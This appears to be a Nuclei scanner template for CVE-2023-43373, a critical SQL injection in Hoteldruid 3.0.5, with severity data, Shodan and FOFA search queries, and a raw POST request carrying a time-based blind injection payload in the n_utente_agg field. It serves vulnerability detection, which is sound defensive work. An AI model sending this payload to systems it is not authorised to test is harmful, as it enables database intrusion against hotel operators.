id: CVE-2023-43373 info: name: Hoteldruid v3.0.5 - SQL Injection author: ritikchaddha severity: critical description: | Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the n_utente_agg parameter at /hoteldruid/interconnessioni.php. impact: | Allows attackers to execute arbitrary SQL queries and potentially gain unauthorized access to the database. remediation: | Update Hoteldruid to a patched version or apply vendor-supplied fixes to mitigate the SQL Injection vulnerability. reference: - https://flashy-lemonade-192.notion.site/SQL-injection-in-hoteldruid-version-3-0-5-via-n_utente_agg-parameter-948a6d724b5348f3867ee6d780f98f1a - https://nvd.nist.gov/vuln/detail/CVE-2023-43373 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-43373 cwe-id: CWE-89 epss-score: 0.23834 epss-percentile: 0.96116 cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 vendor: digitaldruid product: hoteldruid fofa-query: title="hoteldruid" shodan-query: title:"hoteldruid" tags: cve,cve2023,hoteldruid,sqli,vuln flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains(tolower(body), "hoteldruid")' internal: true - raw: - | POST /interconnessioni.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw ------------YWJkMTQzNDcw Content-Disposition: form-data; name="anno" 2023 ------------YWJkMTQzNDcw Content-Disposition: form-data; name="id_sessione" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="modifica_interconnessione" SI ------------YWJkMTQzNDcw Content-Disposition: form-data; name="modifica_utente_agg" SI ------------YWJkMTQzNDcw Content-Disposition: form-data; name="n_utente_agg" 1' AND (SELECT 3869 FROM (SELECT(SLEEP(7)))qSXB)-- QMbZ ------------YWJkMTQzNDcw-- matchers: - type: dsl dsl: - 'duration>=7' - 'status_code == 200' condition: and # digest: 4a0a00473045022100cde91d14b579e07c36d8b09b87a1988382bc9b49d976cb4af2691134b5a3f4e802204100855491146995a147564afac693adb0b941b3857b9807cae1e3fa631d441e:922c64590222798bb761d5b6d8e72950